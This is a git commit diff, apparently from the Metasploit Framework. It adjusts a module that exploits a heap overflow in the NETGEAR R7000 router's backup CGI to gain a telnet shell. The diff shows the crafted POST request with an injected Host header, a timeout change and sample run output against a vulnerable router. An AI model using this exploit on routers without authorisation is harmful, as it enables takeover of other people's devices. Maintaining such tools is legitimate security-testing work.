Add in timeout to 10th and final request to prevent module from throwing errors like it isn't working when it really is
This commit is contained in:
parent
a13f6a35dc
commit
a518fcac98
|
@ -51,9 +51,8 @@ msf6 auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) > run
|
||||||
[*] Executing automatic check (disable AutoCheck to override)
|
[*] Executing automatic check (disable AutoCheck to override)
|
||||||
[*] Router is a NETGEAR router (R7000)
|
[*] Router is a NETGEAR router (R7000)
|
||||||
[+] The target is vulnerable.
|
[+] The target is vulnerable.
|
||||||
[*] Sending 10th and final packet. The exploit should hang at this point.
|
[*] Sending 10th and final packet...
|
||||||
[*] Connect to the telnet shell by running: telnet 192.168.1.1
|
[*] If the exploit succeeds, you should be able to connect to the telnet shell by running: telnet 192.168.1.1
|
||||||
[+] Exploit complete, connect to your shell!
|
|
||||||
[*] Auxiliary module execution completed
|
[*] Auxiliary module execution completed
|
||||||
msf6 auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) >
|
msf6 auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) >
|
||||||
```
|
```
|
||||||
|
|
|
@ -311,8 +311,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
send_data = post_data.to_s
|
send_data = post_data.to_s
|
||||||
send_data.sub!(/\r\n--#{post_data.bound}--\r\n/, '')
|
send_data.sub!(/\r\n--#{post_data.bound}--\r\n/, '')
|
||||||
|
|
||||||
print_status('Sending 10th and final packet. The exploit should hang at this point.')
|
print_status('Sending 10th and final packet...')
|
||||||
print_status("Connect to the telnet shell by running: telnet #{datastore['RHOST']}")
|
|
||||||
|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
|
@ -321,13 +320,9 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
'agent' => nil, # Disable sending the User-Agent header
|
'agent' => nil, # Disable sending the User-Agent header
|
||||||
'headers' => { 'Host' => "#{datastore['RHOST']}:#{datastore['RPORT']}\r\n#{Rex::Text.rand_text_alpha(512)}: #{Rex::Text.rand_text_alpha(9)}" },
|
'headers' => { 'Host' => "#{datastore['RHOST']}:#{datastore['RPORT']}\r\n#{Rex::Text.rand_text_alpha(512)}: #{Rex::Text.rand_text_alpha(9)}" },
|
||||||
'data' => send_data
|
'data' => send_data
|
||||||
})
|
}, 0)
|
||||||
|
|
||||||
if !res.nil?
|
print_status("If the exploit succeeds, you should be able to connect to the telnet shell by running: telnet #{datastore['RHOST']}")
|
||||||
fail_with(Failure::UnexpectedReply, 'The target R7000 router responded on the tenth packet!')
|
|
||||||
end
|
|
||||||
|
|
||||||
print_good('Exploit complete, connect to your shell!')
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def run
|
def run
|
||||||
|
|
Loading…
Reference in New Issue